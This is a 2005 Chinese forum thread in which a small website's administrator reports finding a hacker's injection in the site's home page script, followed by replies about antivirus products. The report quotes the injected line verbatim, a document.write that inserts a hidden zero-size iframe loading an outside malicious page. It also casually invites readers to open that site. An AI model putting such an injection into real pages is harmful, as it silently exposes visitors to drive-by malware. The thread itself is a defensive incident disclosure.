我发表的主题 | 我参与的主题 注册 | 登陆 | 资料 | 短信 | 在线 | 搜索 | 用户 | 排行 | 帮助 
论坛短信(0 新)
莫里康俱乐部 8 网友聚义厅 8 [注意]网站首页有病毒   
回复本帖发表新帖发起投票 点击统计:7579
 帖子主题:[注意]网站首页有病毒 字大:  
hwg



荣誉:管理员
等级:业余侠客
经验:540
帖子:388
注册:2004/3/31
状态:离线
档案 搜索 邮件 短信 引用 编辑 删除 屏蔽/恢复 11
"病毒"问题经过一天努力,逐页排查,终于抓住了黑客的狐狸尾巴.原来黑客在主页上控制WMP播放的一个EM.JS相关文件上作了手脚,写入了document.write("<iframe src=\"http://mylover123456.go3.icpcn.com/images/face/web.htm\" name=\"zhu\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");这样一段代码,前半部分网址就是诺顿提示的"发现威胁",这是一个叫"鑫新网吧"的电影点播网站,似还没有ICP注册,我已发邮件向其提出质询和井告,并准备在没有满意答复时进行投诉(有兴趣可以打开试试,不过一定要先卸掉其它杀毒软件改装好诺顿,瑞星和金山现在还不行,我已向瑞星提供病毒样本并等待他们的意见).这个代码是在9.10夜间3点写入的,包括在10日-11日进入过本站但还没有诺顿的朋友,如果需要,请到这里下载一个诺顿9.0企业版很好用,还可以自动升级.现在病毒已完全清除了,网站已恢复正常运行.在重庆主机的配合下,又采取了新的防范措施,但愿今后不再发生此类问题.像我们这样小小的公益性网站,也招来黑客侵范,可见当前网上之"黑"了,希望大家共防共勉之.也利用这个机会,感谢诸位网友的及时提示和关心,没有你们的提示,这瑞星不知道何时才有反应,(当然,诺顿也不是万能的,网上对诺顿也常见微词,因此众多使用不同杀毒软件的网友的关心是十分必要的)对在此间曾来网站访问的网友带来的影响表示歉意,并请您们采取相应的查杀措施以免除后果.





               [此贴子已经被 hwg 于2005-9-12 8:35:46编辑过]
-------------------------------------------
2005/9/11 21:50:22
sherry



荣誉:管理员
等级:黑侠
经验:1012
帖子:516
注册:2004/3/31
状态:离线
档案 搜索 邮件 短信 引用 编辑 删除 屏蔽/恢复 12
谢谢老韩,辛苦了!
-------------------------------------------
2005/9/12 19:16:47
hwg



荣誉:管理员
等级:业余侠客
经验:540
帖子:388
注册:2004/3/31
状态:离线
档案 搜索 邮件 短信 引用 编辑 删除 屏蔽/恢复 13
2005.9.14接到瑞星的回复:转载如后:
-------------------------------------------------------------
尊敬的客户,您好!
   您的邮件已经收到,感谢您对瑞星的支持。

   我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
   1.文件名:001-你们的网站出现病毒.eml
   不是病毒

   2.文件名:Snap-050913-1427.jpg
   不是病毒

   3.文件名:icyfox[1].js-050913-1427.csv
   不是病毒

   4.文件名:Snap7-050913诺顿历史记录.jpg
   不是病毒

提    醒:为保证收到您的来信,请勿直接回复本邮件!!!
-------------------------------------------------------------
服务单位:瑞星·客户服务中心
工 程 师:CSC033
电话服务:(010)82678800
发送邮件:请用IE等浏览器访问网址 http://csc.rising.com.cn
-----------------------------------------------------------------------

呜乎!一头雾水迷茫,真搞不清哪个是"专家"???看来只好"难得糊涂"了!!!
-------------------------------------------
2005/9/14 18:06:55
叶公好龙



荣誉:版主
等级:蒙面侠
经验:1834
帖子:1164
注册:2005/5/31
状态:离线
档案 搜索 邮件 短信 引用 编辑 删除 屏蔽/恢复 14
我买过正版金山,它把我的电脑弄得一蹋胡涂,结果把它扔了。

瑞星防火墙反应过敏,弄到上网不正常,连访问本站和熊猫也不成,只能访问中华、网易等的大网站,(关于这点熊猫网也有反映)。

瑞星、金山见鬼去吧!




                  [此贴子已经被作者于2005-9-15 14:25:09编辑过]
-------------------------------------------
我 说 真 话  
2005/9/14 20:03:06
首页 上页 当前第 页 下页 尾页
回复主题:[注意]网站首页有病毒
 表情符号:(更多表情请点这里)
帖子字数:最大 16384 字符

UBB 支持

HTML标记: ×

表情符号
               
 上传附件:(附件最大 100 KB)
    
程序内核:Spb 3.0.4013 当前风格:默认 风格制作:netasp
执行时间:56.0 毫秒 页面装载: